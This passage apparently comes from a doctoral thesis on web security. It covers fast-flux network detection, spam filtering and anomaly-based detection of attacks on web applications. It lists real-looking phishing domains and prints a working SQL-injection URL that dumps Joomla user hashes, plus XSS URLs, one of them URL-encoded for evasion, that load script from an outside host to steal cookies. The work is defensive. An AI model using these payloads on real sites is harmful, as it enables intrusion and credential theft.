cgi.ebay.com.modefst10.mobi, cgi.ebay.com.msdrvffg.net, cgi.ebay.com.msdrvt1.bz,
cgi.ebay.com.msfddre.com, cgi.ebay.com.mtdfggs.com, cgi.ebay.com.sdlserverts.com,
cgi.ebay.com.trffdsl.com, cgi.ebay.com.vfrres.com, cgi.ebay.com.vsdfggg.net,
cgi.ebay.com.vvssldr.com, cgi.ebay.com.vvssldr.net, cgi.ebay.com.vzdfff1.com,
cgi.ebay.com.dllmsdrv.net
On-line pharmacy scam fiweixg.cn, fshioiwg.cn, fsieoowf.cn, galn.sfoioiiw.cn, gba.sdigwpd.cn, gdao.sfoioiiw.cn,
gdap.sdigwpd.cn, gdou.sdigwpd.cn, gdq.sfoioiiw.cn, gff.fsieoowf.cn, gfnt.fsieoowf.cn,
ggq.fieooief.cn, ggq.sdigwpd.cn, gguf.ssmmmwp.cn, gh.dipmmeig.cn, gib.fsieoowf.cn, gib.igemmpi.cn,
giew.igemmpi.cn, gii.fsieoowf.cn, gjhn.dipmmeig.cn, gkah.sdigwpd.cn, glhh.sfoioiiw.cn,
glqu.sfoioiiw.cn, gmb.sdigwpd.cn, gnum.sdigwpd.cn, gnvq.fshioiwg.cn, gpb.sdigwpd.cn,
gpq.fieooief.cn, gpwc.sdigwpd.cn, gqk.sfoioiiw.cn, grd.sfoioiiw.cn, grx.sfoioiiw.cn,
gsew.fieooief.cn, gsvg.fsieoowf.cn, gtf.dipmmeig.cn, gtr.dipmmeig.cn, gtse.fshioiwg.cn,
gudl.sfoioiiw.cn, guo.bssigrpi.cn, gvhd.sfoioiiw.cn, gvxl.fsieoowf.cn, gvy.fsieoowf.cn,
gwc.sfoioiiw.cn, gwgz.sdigwpd.cn, gwz.fshioiwg.cn [· · · many more]
Bank/IRS phishing chaseonline.chase.com.omersw.com, chaseonline.chase.com.omersr.net, chaseonline.chase.com.omersr.com,
chaseonline.chase.com.omersf.net, chaseonline.chase.com.omersf.com, chaseonline.chase.com.omersd.net,
chaseonline.chase.com.nyterdasq.net, chaseonline.chase.com.nyterdasq.com,
chaseonline.chase.com.omersx.net, chaseonline.chase.com.omersx.com, fwd.omersf.net,
chaseonline.chase.com.nyterdasp.net, 02fgu145501.cn, chaseonline.chase.com.nyterdasp.com,
chaseonline.chase.com.omersw.net, ger11zr.com, c.omersx.com, www.irs.gov.ger11zh.net,
www.irs.gov.yh1ferz.info, www.irs.gov.yh1ferz.com, www.irs.gov.ger11zr.com,
www.irs.gov.merfaslo.com, www.irs.gov.ger11zh.com, www.irs.gov.ger11zx.eu, gshipagc.com,
gshipagc.net, www.ger11zf.net, grph.omersf.net [· · · many more]

Table 3.3: Some examples of malicious fast flux networks detected by Flux Buster.



Figure 3.12 shows the number of websites that have been visited (in yellow) by
the Google safebrowsing engine. It is worth noting that out of 16,375 flux domain
names, only 629 (3.8%) of them are related to analyzed websites. Among all flux
domain names which have been analyzed by Google safebrowsing, 87.3% (529) have
been recognized as malicious.
These results highlight some important characteristics of flux domain names.
First, it is clear that most flux domain names are actually unknown to Google
(i.e. they are not related to websites analyzed by Google safebrowsing). As a
consequence, we speculate that most flux domain names are advertised by webpages
not indexed by Google, or by means of non-web-based forms of advertisement. In
fact, during our experiments we came across several compromised websites whose
injected HTML code was in the form:

<META NAME="ROBOTS" CONTENT="NOFOLLOW">


<script src=http://fast-flux-domain-name1/script.js>
<script src=http://fast-flux-domain-name2/script.js>
...
<script src=http://fast-flux-domain-nameN/script.js>

The META tag prevents search engines from indexing any link within the page. Then,
a list of links pointing to malicious scripts hosted through fast flux networks is
provided. Miscreants provide redundant links to the same script by means of
different fast flux domain names; in this way, the exploit works if any of these
domain names is active. Thus, the injected client-side exploit is aimed at forcing
the user's browser to fetch (and execute) malicious scripts, while preventing search
engines from indexing the related links.
Our analysis shows that most websites related to fast flux domain names
analyzed by Google are recognized as malicious. However, some of them are
recognized as legitimate by Google safebrowsing. For example, this is the case of
the following flux domain names:

online.lloydstsb.co.uk.2z6ht9vcfl.com
online.lloydstsb.co.uk.3yjvl43o3a.com
online.lloydstsb.co.uk.5nfq2v9ph9.com
online.lloydstsb.co.uk.623hneczc1.com
online.lloydstsb.co.uk.g6eyxto9ri.com

It is easy to see that these malicious domains have been employed for a bank
phishing scam. Nevertheless, they are deemed legitimate by Google. Figure 3.14
shows the Google safebrowsing report on one of these fast flux domain names. We
obtained a similar result by checking fast flux domain names against the domain
blacklist of www.malwaredomains.com (see Figure 3.13). Malwaredomains' blacklist
is valuable since it is compiled from a variety of reliable sources [Likarish (2009)].
Nevertheless, only 715 fast flux domain names (4.4%) are actually recognized as
malicious. This highlights that the passive acquisition of RDNS queries/replies on
large computer networks allows gaining a privileged observation standpoint.

Summarising, our study shows that Flux Buster may signal a relevant number of
malicious domain names that are not noticed by the Google safebrowsing blacklist
(on average, about 5,250 domain names per month). The key point is that we
may detect such malicious domain names independently of the way they are
advertised. Besides this contribution, we may provide real-time detection of
malicious domain names. Real-time detection is fundamental to protect users
against phishing scams and spam emails. These aspects are studied in the following
section.

3.4.2 Spam Filtering


In this Section we analyze to what extent the information about malicious flux
networks, passively gathered at the RDNS level using our detection system, can
support real-time detection of malicious domain names. In particular, we focus on
detecting whether domain names found in spam emails are somehow related to
malicious flux networks detected by our system, as shown in the example of
Figure 3.15. Assume a mail server receives an email which contains a link to a
certain website, performs a DNS query for the domain name embedded in the link,
and forwards the email to the spam filter along with the obtained set, say R_f, of
resolved IP addresses. At this point the spam filter can inspect the content of the
email, and also check if there is any intersection between the set R_f and any of
the malicious flux networks identified by Flux Buster. If a significant intersection
(i.e., common IP addresses) is found, the spam filter can increase the spam score
related to the email, and use this information for making a more accurate overall
decision about whether the received email should be classified as spam or not. The
intuition is that if the domain name of the website advertised through spam points
to one or more previously detected flux agents, it is very likely that the content of
the advertised website is malicious.
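The following Python sketch illustrates this check. It is a minimal sketch under
stated assumptions: sim() is a simple overlap ratio standing in for the similarity
metric of Equation 3.1 (not reproduced here), and the threshold and boost values are
purely illustrative.

def sim(resolved_ips, flux_agents):
    # Stand-in overlap measure: fraction of the resolved IPs that
    # belong to the pool of known flux agents.
    if not resolved_ips:
        return 0.0
    return len(resolved_ips & flux_agents) / len(resolved_ips)

def spam_score_boost(resolved_ips, flux_agents, theta=0.5, boost=1.0):
    # If the overlap is significant, return an extra score that the
    # spam filter can add to its overall decision.
    return boost if sim(resolved_ips, flux_agents) > theta else 0.0

# Usage: Rf comes from the mail server's DNS lookup, flux_agents from
# Flux Buster's output (both are hypothetical values here).
Rf = {"203.0.113.7", "203.0.113.9", "198.51.100.4"}
flux_agents = {"203.0.113.7", "203.0.113.9", "192.0.2.77"}
print(spam_score_boost(Rf, flux_agents))  # 1.0: two out of three IPs match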

A similar spam detection process may be used for types of spam different from
email spam. For example, using a browser plug-in, this detection process may
be extended to identify blog spam, social network spam, etc., before users access
the malicious content. Therefore, the output of our malicious flux detection system
may contribute to a number of different spam filtering applications. Also, enterprises
may set up their own Recursive DNS to identify malicious domain names using this
approach, as sketched below. For example, the RDNS may provide users with the
set of resolved IPs only if a domain name is deemed legitimate; otherwise, it may
just return the IP address of a local machine, to prevent client-side applications from
loading malicious content from flux agents. This way, all employees and client-side
applications may be protected.
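A minimal sketch of this RDNS-level policy follows. Here resolve() is a placeholder
for the resolver's normal lookup routine, and the sinkhole address and threshold are
illustrative assumptions.

SINKHOLE_IP = "127.0.0.1"  # local machine, e.g. serving a warning page

def filtered_resolve(domain, resolve, flux_agent_ips, theta=0.5):
    ips = set(resolve(domain))  # normal recursive resolution
    overlap = len(ips & flux_agent_ips) / len(ips) if ips else 0.0
    if overlap > theta:
        # The domain points into a known flux network: hand back the
        # sinkhole address instead of the real flux agents.
        return [SINKHOLE_IP]
    return sorted(ips)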

In order to measure to what extent our detection system may benefit email spam
filtering, we proceeded as follows. We obtained a feed of URLs extracted from spam
emails captured by a mid-size email spam-trap during a period of 30 days, between
March 1 and March 30, 2009. This feed provided us with an average of 250,000 spam-
related URLs per day, from which we extracted about 86,000 new (i.e., never seen
before) domain names per day. Let D_{k+1} be the set of spam-related domain names
collected on day k+1, S^{(d)}_{k+1} be the set of resolved IPs obtained by performing
one DNS query for domain d ∈ D_{k+1}, and R̂^{k}_{k−l} be the overall set of IP
addresses of flux agents detected by our malicious flux network detection system in
the period from day k−l to day k. In order to obtain a suspiciousness score s(d) for
domain d, we use the similarity metric defined in Equation 3.1 to compute
s(d) = sim(S^{(d)}_{k+1}, R̂^{k}_{k−l}), i.e., the degree of overlap between the
resolved IPs of domain d and the malicious flux networks we were able to detect
from RDNS traffic. If the value s(d) exceeds a predefined threshold θ, we classify
the domain name d as malicious; otherwise, we classify it as legitimate. We repeat
this process for each spam-related domain name d ∈ D_{k+1} to estimate the
detection rate of the proposed approach, namely the percentage of spam-related
domain names that may be identified by a spam filter. Furthermore, we considered
the list of domain names related to the top 600,000 most popular web sites
according to Alexa (www.alexa.com) to estimate the false positives that may be
generated by our detection approach. Let A be the set of these popular websites.
For each domain α ∈ A, we perform a DNS query, collect the set of resolved IP
addresses R^{(α)}, and compute the similarity score s(α) = sim(R^{(α)}, R̂^{k}_{k−l}).
Again, if s(α) > θ we classify α as malicious. In our experiments, we assume the
domain names in the set A are legitimate/non-flux domains. Therefore, any domain
α for which s(α) > θ is considered as a false positive. Figure 3.16 reports the ROC
curves (i.e., the trade-off between false positive and detection rate) obtained by
varying the detection threshold θ, using a fixed value of l = 2, and for four different
values of k (i.e., four different days). It is easy to see that the detection approach
described above produces a detection rate of domain names advertised through
spam emails between 90% and 95%. It is worth noting that not all of the detected
malicious domains are necessarily fast-flux domains. We noted that several of the
domain names detected as malicious did not appear to have a fluxing behavior
themselves, but resolved to a fixed set of IP addresses that partially intersected
with the IP addresses of flux agents we detected from our passive analysis of RDNS
traffic. A more detailed analysis revealed that these fixed sets of flux agents
consisted of machines with a high average uptime. Therefore, we speculate that
highly reliable compromised machines may be used as part of larger flux service
networks, as well as stand-alone providers of malicious content. It is also worth
noting that the false positive rate of our approach for detecting spam-related
malicious domains is less than 0.002%. This confirms that our proposed (real-time)
approach to the detection of malicious domain names is very promising and may
substantially benefit spam filtering applications and protect web users.

3.4.3 Limitations, possible solutions and future work


In this Section, we discuss some limitations of the proposed approach to the detection
of fast flux networks. As pointed out in Section 2.4, it is important to identify
the limitations of security tools, in order to be able to cope with an adversarial
environment.

First and foremost, we may detect only fast flux domains that are resolved by
at least one user in the monitored networks. Thus, a reasonable statistical sample of
popular fast flux domains (and their resolved IPs) may be gained only by collecting
RDNS traffic in large computer networks (as in our case): our approach may
be effective only if applied to large networks, such as those managed by
Internet Service Providers. This implies that ISPs must collaborate and allow the
acquisition of RDNS traffic.
Furthermore, even if our prefiltering stage is very conservative, it is possible
that some flux domain names are erroneously prefiltered. To this end, a detailed
evaluation is required. For example, we could select filtered domain names whose
patterns lie near the decision surface of our prefiltering stage, and then analyze
them using other fast flux detection tools (e.g. [DNSBL]).
More importantly, due to the massive amount of data Flux Buster has to process,
its responsiveness is limited: it may require two or three days before reaching a
decision about a domain name. However, this limitation may be mitigated by
employing the detection approach described in Section 3.4.2.
On the other hand, flux operators may inject some noise into the pool of flux agents
detected by Flux Buster. For example, the false-positive malicious domain names in
Figure 3.16 were caused by a few legitimate IP addresses in our list of flux agents. A
detailed analysis revealed that this was caused by some non-conventional flux
domain names. These domain names resolved to legitimate IP addresses, pointing to
web services such as search engines (e.g. Google, Virgilio), but also to flux agents,
using a fast flux technique. Of course, this approach is in some way counterproductive
from the flux operator's point of view, since some users may be redirected to
legitimate websites. We speculate that this behavior may be due to some configuration
test performed by flux operators. However, in principle, fast flux operators
may deliberately inject some legitimate IP addresses into the pool of flux agents.
They pay a price in terms of reduced effectiveness of their flux domain names, but
in this way they may affect the reliability of our system.
In order to cope with this issue, we may filter known-as-legitimate IP addresses out
of the pool of flux agents, e.g. by extracting all IP addresses used by the most popular
websites according to rankings such as Alexa's.
Finally, Flux Buster is not in opposition to other fast flux network detection
tools employing active approaches: it simply adopts a complementary approach.
Thus, for a clearer view of the fast flux phenomenon, it is necessary to correlate
information from multiple tools, employing different approaches and different
input data sources. Also, the output of Flux Buster should be public, in order to
benefit the security community. Unfortunately, due to some privacy issues this is not
(currently) possible. However, we may grant access to security researchers (visit
the official website http://dnsrecon.gtisc.gatech.edu).
Figure 3.7: Results of the Data Volume Reduction Process. For each sensor (Sensor 1
and Sensor 2), the plots report the daily query volume (x10^9) and the number of
candidate flux domains (x10^4) over a 45-day observation period.

Figure 3.8: The Flux Buster validation interface, showing a fast flux network
identified by Flux Buster. Through this interface we may obtain further information
about the detected flux networks, as well as validate them and identify the scam
typology they support.

Figure 3.9: The Flux Buster validation interface, showing a legitimate network
identified by Flux Buster. As we can see, multiple domains of the European NTP
pool are grouped together.

Figure 3.10: Example of dendrogram. The vertical axis reports the height (from 0
to 140) at which the domains d1, ..., d9 are progressively merged into clusters.



Figure 3.11: Distribution of flux agents (detected by Flux Buster) among different
countries: US 34.3%, RU 8.1%, JP 4.9%, ES 4.0%, RO 3.5%, DE 3.5%, others 41.6%.

Figure 3.12: Unique flux domain names detected in the time interval November 3,
2009 - February 2, 2010 (blue). Among them, only 629 are related to websites
analyzed (visited) by the Google safebrowsing engine (yellow). Out of all visited
websites employing the fast flux technique, 87.3% (529) have been evaluated as
malicious by the Google safebrowsing engine (red).

Figure 3.13: Unique flux domain names detected in the time interval November 3,
2009 - February 2, 2010 (blue). Among them, only 715 are noticed by
www.malwaredomains.com.

Figure 3.14: Google safebrowsing's diagnostic page for a fast flux domain name used
for bank phishing purposes.

Figure 3.15: Example of how our malicious flux network detection system can benefit
spam filtering.

Figure 3.16: Detection of malicious domains in spam emails.


Chapter 4

Protecting Web Services

Criminals need only find one open door to get in, whereas
defenders need to protect all the doors.

Unknown

Cyber criminals aim at exploiting the web to their own advantage, without
qualms about the rights of other Internet users. As we have seen in the previous
Chapter, fast flux networks represent a sophisticated threat for web users; in the
case of flux networks, the attacker operates at the server side. On the other hand,
miscreants may also operate at the client side: they may attack web services to
steal confidential information, acquire high-level privileges on targeted servers, or
slow down or completely disrupt services. These attacks may cause financial and
image damages, and may in turn harm the users that subsequently access these
services. Thus, it is not sufficient to enhance client-side web security: in order to
enhance web security, we must also improve the security of web services. This is
clear from all recent Internet security reports (see Section 2.3.2). In recent years
there has been a lot of effort to improve the security of web applications. Many
international organizations, such as the OWASP foundation and the Web Application
Security Consortium, are specifically dedicated to enhancing the security of web
applications. Nevertheless, there is still a significant lack of awareness and security
training among web developers. Also, the complexity of web services makes
server-side security an intrinsically difficult problem.
Web Application Firewalls (WAF) represent the state-of-the-art instrument to
block malicious web requests. However, they adopt a rule-based approach that
makes protecting web services over time expensive and challenging. To cope with
this problem, we focused our research on anomaly-based approaches to the detection
of server-side web attacks. In this chapter we present our research contributions.
First, in Section 4.1 we outline the threat model for web services. In Section 4.2 we
summarize related work on the detection of attacks against web services.

Then, in Section 4.3 we present HMM-Web, an anomaly-based IDS for the
detection of attacks against web applications. HMM-Web may be trained
autonomously, and we will show experimentally that it produces a very high
detection rate and a very low false positive rate. A key contribution of HMM-Web
is its capability of explicitly handling and detecting attacks (i.e. noise) within its
training set. The main limitation of HMM-Web is that it analyzes web server logs,
from which some fields of the web requests cannot be observed. For example, web
application inputs sent through an HTTP POST request cannot be analyzed from
the web server's log.

Thus we designed Web Guardian, an anomaly-based IDS which represents the
evolution of HMM-Web. Web Guardian operates with ModSecurity, the most
popular open-source Web Application Firewall. As such, it is able to inspect every
field of the HTTP requests, even if they are carried through an encrypted channel
(HTTPS). Moreover, it may provide real-time counteractions if suspicious web
traffic is found. Web Guardian, together with a preliminary experimental evaluation
of its performance, is presented in Section 4.4. We will show that our detection
system may provide advanced protection against both known and unknown attacks
against web servers and web applications.

4.1 Threat model


Miscreants may attack web services at different abstraction levels. For example, at
the TCP level, they may employ the well-known SYN flooding attack [CERT (1996)].
With a sufficient number of hosts (e.g. pertaining to a botnet), SYN flooding
(combined with IP spoofing) may take down (or heavily degrade) any Internet
service (Denial of Service attack). Content Delivery Networks (see Section 3.1.1)
make web services more resilient to this kind of attack [Lee et al. (2005)]. However,
due to the nature of the TCP protocol, SYN flooding attacks are very difficult to
address.

In addition, attacks can be carried out at the HTTP/HTTPS level, i.e. against the
web server. These attacks are typically performed by submitting web requests having
malicious fields: for example, an unexpectedly large value for the message chunk
length, aimed at exploiting an integer overflow vulnerability (chunked encoding
attack) [Mutz et al. (2005)]. In general, a vulnerability in the web server's request
processing may allow the attacker to execute arbitrary instructions, cause a Denial
of Service, bypass Secure Sockets Layer authentication, or include arbitrary HTML
code in the web server's reply (Cross-Site Scripting, XSS) [Apache Vulnerabilities].

Last, but not least, attacks may leverage web application vulnerabilities. As
mentioned in Section 2.1, web application attacks constitute the primary threat to
web services. Web applications may be attacked by submitting well-crafted inputs
that exploit input validation or logical flaws. Cross-Site Scripting and SQL Injection
are the most popular attacks, and leverage input validation flaws [Spett (2002)]
[WASC (2010)].

For example, let us consider a hotel website based on the popular open-source
CMS Joomla and employing the so-called Joomla Hotel Booking System Component.
Version 1.x of such a component is vulnerable to XSS and SQL Injection
[K-159 (2009)]. In particular, inputs passed via the h_id and id attributes of the
web application longDesc.php are not properly validated before being used in SQL
queries. The Joomla CMS maintains a SQL table jos_users with a row entry for
each user. Each row entry contains the username and password (hashed using the
MD5 algorithm) of a Joomla user. For example, we may have:

username password
admin 1a1dc91c907325c69271ddf0c944bc72
joe c1572d05424d0ecb2a65ec6a82aeacbf
··· ···

An attacker may obtain this (confidential) information by just retrieving the
following URL:

http://www.vulnerablehotel.com/components/com_hbssearch/longDesc.php?h_id=1&
id=-2%20union%20select%20concat%28username,0x3a,password%29%20from%20jos_users

This SQL Injection attack exploits an input validation flaw on the attribute id, in
order to execute arbitrary SQL instructions on the back-end MySQL database. The
application longDesc.php will return a page containing the usernames and hashed
passwords of the Joomla users. The attacker may then run an (offline) automated
password guessing attack to find out the passwords (including the admin password).
Administrator access to the booking portal allows the attacker to perform any
kind of manipulation, just by using the CMS.
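Although the vulnerable component is written in PHP, the principle of the fix can
be sketched in Python: enforce the expected input type, and never concatenate
inputs into the SQL text, using parameterized queries instead. This is only an
illustrative sketch (sqlite3 is used for self-containedness; table and column names
are hypothetical):

import sqlite3

def get_long_description(conn, h_id, id_):
    # (1) Enforce the expected type: int() raises ValueError on inputs
    # such as "-2 union select ...", stopping the attack early.
    h_id_num, id_num = int(h_id), int(id_)
    # (2) Parameterized query: the driver binds the values, so any
    # injected SQL fragment is treated as plain data, not as code.
    cur = conn.execute(
        "SELECT long_desc FROM hotels WHERE h_id = ? AND id = ?",
        (h_id_num, id_num),
    )
    return cur.fetchone()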

On the other hand, the attacker may exploit an XSS vulnerability in the application
index.php. When option=com_hbssearch and task=showhoteldetails, input
passed via the adult attribute is not properly validated before being used. This
can be exploited to inject arbitrary HTML code in the page generated by the web
application. For example, if a user clicks on the following link (e.g. because he
trusts www.vulnerablehotel.com):

http://www.vulnerablehotel.com/index.php?option=com_hbssearch
&task=showhoteldetails&id=118&adult=2<script src=http://www.dbrgf.ru/script.js>

the injected code (the <script> tag above) will be included in the HTML page
generated by index.php. This allows an attacker to run arbitrary Javascript code
(retrieved from http://www.dbrgf.ru/script.js) in the user's browser. For example,
the malicious code may be hosted through a fast flux network (e.g. www.dbrgf.ru
may be a fast flux domain name). The malicious code may exploit client-side
vulnerabilities, steal the user's cookies, or steal any other confidential information
in the context of the affected site.

A number of tags other than <script> </script> may be used to inject
Javascript code and evade filters and WAF [Hansen (2009)]. Also, a number of
obfuscation techniques may be used to hide malicious code from users. For example,
the previous XSS attack may be rewritten using ASCII (URL) encoding:

http://www.vulnerablehotel.com/index.php?option=com_hbssearch
&task=showhoteldetails&id=118&adult=2%3C%73%63%72%69%70%74%20%73%72%63%3D
%68%74%74%70%3A%2F%2F%77%77%77%2E%64%62%72%67%66%2E%72%75%2F%73%63%72%69
%70%74%2E%6A%73%3E
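A short Python sketch shows why such encoding defeats naive signature matching,
and why inputs should be normalized (URL-decoded) before any filtering step; the
payload below is the encoded fragment of the request above:

from urllib.parse import unquote

encoded = ("2%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%77%77%77"
           "%2E%64%62%72%67%66%2E%72%75%2F%73%63%72%69%70%74%2E%6A%73%3E")

print("<script" in encoded)           # False: a naive signature misses it
print("<script" in unquote(encoded))  # True: decoding reveals the payload
# unquote(encoded) == '2<script src=http://www.dbrgf.ru/script.js>'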

Similarly, a wide range of advanced WAF evasion techniques is available for SQL
Injection [Mac Vittie (2007)] [L0t3k].

From this example, it may seem easy to avoid XSS and SQL Injection
vulnerabilities: it would suffice to check that the h_id and adult attributes receive
only integer values. Nevertheless, in general this is not an easy task. The key point
is that web applications (such as those used by Joomla) may be high in number and
may be very complex (i.e. perform complex operations). Web applications may
handle many inputs, and it is necessary to take into account all possible input
combinations and exceptions. This is not straightforward and, unfortunately, most
web developers lack the security training needed to cope with the most common
software flaws. Also, web applications are often developed under strict time
constraints.

Currently deployed security solutions typically rely on Web Application
Firewalls (WAF, e.g. ModSecurity [Modsecurity]), which filter application inputs
using a predefined set of rules, and on signature-based Intrusion Detection Systems
(e.g. [PHP IDS] [Snort]1), which detect attacks using a set of (known) attack
signatures. Unfortunately, these systems can be evaded by modifying known attacks
or exploiting new vulnerabilities [Vigna et al. (2005)]. Furthermore, since each web
application expects specific inputs, configuring a WAF to filter out malicious inputs
is expensive: WAF rules must be updated as soon as web application inputs change
or new applications are added. All these considerations motivate our work.

4.2 Detecting attacks against web services


Early work on anomaly-based detection of attacks against web services, as
well as other network services, relied mostly on the analysis of network traffic
(network-based) [Wang et al. (2004), Lippman et al. (2000)]. In the last years, a
more specific (host-based) analysis has been proposed [Kruegel et al. (2005) (a),
Ingham et al. (2007)], based on the analysis of web server logs.

In [Kruegel et al. (2005) (a)], the authors proposed a multi-model framework
for the detection of attacks against web applications. They modelled (legitimate)
queries using both spatial features (related to a single request) and temporal
features (related to multiple consecutive requests). Different models were applied
to represent these features, with the HMM being the most powerful of them. In
particular, they codified web application queries by extracting the sequence of
attributes and, for each attribute, its input, codified as a sequence of characters.
HMM were used to model attribute inputs without taking into account the typical
semantic differences between classes of characters (alphabetic, numeric,
non-alphanumeric), which usually determine their meaning. Moreover, the authors
did not fully exploit the power of such a model, because they rounded every
non-zero probability value to one. Finally, the training set was assumed to be
attack-free, after filtering it with a signature-based IDS in order to throw out at
least known attacks.

1 Actually, Snort may also employ an anomaly-based preprocessor, the Statistical
Packet Anomaly Detection Engine (SPADE). However, it is not specifically developed
to detect web application attacks; instead, it looks for anomalies in some statistical
features of the network traffic.
In [Robertson et al. (2006)], the authors adopt an anomaly detection approach
very similar to [Kruegel et al. (2005) (a)]. However, they also group anomalies
according to their typology and infer the associated attack class according to a set of
heuristics based on known attack patterns. This is a very interesting approach, for
two main reasons. First, by grouping anomalies having similar features, false alarms
are grouped together as well, and thus it should be easier for a security administrator
to cope with a relatively high amount of false alarms. Second, anomaly-based systems
typically provide poor information about the type of attack that is associated with
an anomaly; thus, it is interesting to automatically infer the attack class to which
an anomaly belongs.
In [Bolzoni and Etalle (2008)] the authors propose to subdivide web application
inputs into two classes, regular and irregular. Depending on the class, they
apply a different machine learning approach to the modeling of their legitimate
values. In particular, regular inputs are automatically modeled using regular
expressions, whereas irregular ones are modeled using a simpler approach (based on
a previously developed anomaly-based IDS). This is justified, since different inputs
may have very different variability. For example, the attribute id in the example
of Section 4.1 should receive only integer values. In contrast, some other attributes
may receive very variable inputs. As an example, this is the case of the attribute q
in the web application employed by the Google search engine (i.e.
http://www.google.com/search?q=searchkey). It receives the search key, which may
contain any character. Similarly to [Kruegel et al. (2005) (a)], the main limitation
of the approach is that it is not able to cope with noise in the training set. The
authors in [Bolzoni and Etalle (2008)] collect the training set from production web
servers and throw out known attacks employing a signature-based IDS and manual
inspection. However, in general this may not be sufficient, and training set noise
may significantly affect the modeling of legitimate inputs [Cretu et al. (2008)].
In [Ezeife et al. (2008)] malicious HTTP requests are detected using a mixture
of legitimate traffic models and high-level signatures for web attacks. High-level
signatures are defined in an a priori fashion, on the basis of typical attack patterns.
For example, the presence of the < and > characters in web application inputs may
indicate XSS attacks, whereas the quote character ' may indicate a SQL Injection
attack. Furthermore, legitimate web application inputs are described using simple
models, built using a sample of real HTTP traffic on the web server: they model the
set of attributes and the length of their values. An anomaly score is increased
whenever a high-level signature matches the current request (or multiple requests),
or web application inputs do not match the model of legitimate inputs. If this
score exceeds a predefined threshold, an anomaly is raised. Data is extracted from
both network and host (web server logs) sources. This is interesting since the
authors correlate both input and output traffic on the web server and analyze web
application inputs submitted through POST requests. However, it must be verified
how robust the approach in [Ezeife et al. (2008)] is against evasion attacks, since
it relies on very simple models. For example, an attacker may evade known XSS
signatures by employing ASCII encoding. Also, the attacker may limit the length of
malicious XSS code so that it is recognized as legitimate (i.e. so that the anomaly
score stays under the threshold) by the detector (see Section 4.1).

In [Guyet et al. (2009)] a self-adaptive web intrusion detection system is
presented. The authors adopt a multi-agent approach inspired by the Dempster-Shafer
(DS) theory of evidence [Shafer (1986)]. In particular, for each request, they extract
the URI's character distribution, the sequence of tokens2 which compose the URI, and
the ratio between successful and unsuccessful requests performed by the source IP
address of the request. They employ a labeled training set containing legitimate
HTTP traffic from production web servers and (injected) known attacks, in order
to bootstrap the models of the agents. Then, the agents are able to self-adapt their
models by analyzing new requests. The approach is interesting, and the authors
showed that self-adaptation may allow detecting and modeling new attack instances.
However, the authors experimented with generic attacks, i.e. known attacks against
web servers and applications. Such generic attacks are easy to spot, since they
typically fail: for example, they may target web applications which are not installed
on the web server, or other types of web servers. In contrast, real web application
attacks are tuned to the specific application inputs in order to be effective. Thus,
the actual performance of the approach in [Guyet et al. (2009)] remains to be
verified.

The paper [Torrano et al. (2009)] proposes an anomaly-based WAF. The authors
store the definition of legitimate requests in an XML file. In particular, the XML
file describes legitimate values for the request method and headers, and the allowed
paths for request URIs. Also, for each web application attribute, the XML file
describes (a) the set of allowed non-alphanumeric characters, and the maximum and
minimum allowed (b) input length, (c) number of digits, (d) number of letters, and
(e) number of non-alphanumeric characters. This approach is simple and very
effective in detecting web application attacks that leverage input validation flaws.
However, a key problem of the approach is that the inference of the legitimate
profile requires a clean training set. Unfortunately, in a real environment, such a
training set is very hard to obtain. A further problem is taking equivalent URIs
into account. This may cause false positives, since the same resource may be
identified by multiple URIs (see for example mod_rewrite of the Apache web server),
but only a small portion of them may be present in the training set, and thus
recognized as legitimate. Moreover, this system is not able to inspect HTTPS (i.e.
the typical protocol used for web services managing sensitive information), since it
acts in a way similar to HTTP proxies.

2 Each token is a string comprised between two meta-characters within the set
[/, ?, =, &].

In [Krueger et al. (2010)] a reverse HTTP proxy is proposed to counter malicious
web requests. HTTP request fields are parsed and stored as token-value pairs. In
particular, the Request URI (e.g. the web application path) and each web application
attribute are considered as separate tokens. Each token is analyzed by an anomaly
detector and, if a suspect value is found, a healing action is performed: for example,
the value can be removed, replaced or encoded, in order to defeat a possible attack.
The anomaly detectors can be trained in a semi-automated fashion and may cope with
noise (i.e. attacks) in the training data. The weak point of the approach proposed in
[Krueger et al. (2010)] is that the web application path and its attributes are
analyzed independently of each other. Thus, the relationship between a web
application and its inputs is not taken into account: the same attribute name may
potentially be used by multiple web applications, and it may receive completely
different values. Input values that may be legitimate for one web application may be
anomalous (and potentially harmful) for other applications, and vice-versa.
Furthermore, it may be hard to correctly tune the healing actions for each token,
so as not to affect legitimate requests. Similarly to [Torrano et al. (2009)], this
approach is not able to monitor HTTPS traffic.

4.2.0.1 Our contribution

HMM-Web. From an operational point of view, the context of
HMM-Web [Corona et al. (2009)] is the same as [Kruegel et al. (2005) (a),
Ingham et al. (2007)]. In particular, we compare our approach with
that in [Kruegel et al. (2005) (a)], which is the most similar work. HMM-Web is
trained in an unsupervised way, by processing web application queries as logged by
the web server (training set). Such an approach relies on the assumption that the
great majority of web application queries in the training set is legitimate. This is a
reasonable assumption, because the typical web user accesses services as expected.

With HMM-Web we exploit the power of Hidden Markov Models to detect
simple as well as sophisticated attacks against web applications. We experiment with
real traffic extracted from production web servers. To the best of our knowledge,
HMM-Web is the first work which explicitly handles the noise in the training set,
where the noise is made up of web attacks. This is important because, as we
will see, real traffic cannot be assumed noiseless. Due to the ad-hoc nature of
web applications, automatic filtering methods based on signature-based IDS are not
effective, and manual inspection is not feasible in practice. Our system is not only
able to effectively model the legitimate traffic, but also to detect attacks that are
similar to the noise in the training set. To this end, we optimise the IDS parameters
on the basis of the fraction of non-legitimate queries we expect in the training set.
Experimental results show that even a raw estimate of this parameter can effectively
enhance the detection rate, with a small amount of false positives.

Another contribution of HMM-Web is the codification of the input sequences
analysed by the HMM. Many works in the security area simplify the intrusion
detection problem by training classifiers on raw data, skipping some known semantics
of the data. On the other hand, we explicitly codify queries to highlight the most
relevant semantic aspects of their structure. This operation leads to substantially
better IDS performance and to a reduced complexity of the HMM learning task.

Finally, HMM-Web proposes a novel way, based on a-priori knowledge of
this intrusion detection problem, to correlate HMM, relying on the Multiple
Classifier System (MCS) paradigm [Kuncheva (2004)]. Recent studies showed
experimentally that the MCS paradigm can outperform single classifier systems,
since an MCS is more difficult to evade and able to reduce the false positive rate
[Perdisci et al. (2006) (b)].

Web Guardian. Counteractions against server-side web attacks should be
performed in real time, as soon as an intrusion attempt is detected. This is because,
once the attacker has found a vulnerable web service, he may exploit it in a matter
of seconds. Furthermore, some web applications having well-known vulnerabilities
(see the example in Section 4.1) may be compromised automatically by a software
(ro)bot. To cope with this problem, recent work such as [Torrano et al. (2009)] and
[Krueger et al. (2010)] proposed the combination of anomaly-based detection and
automated counteractions.

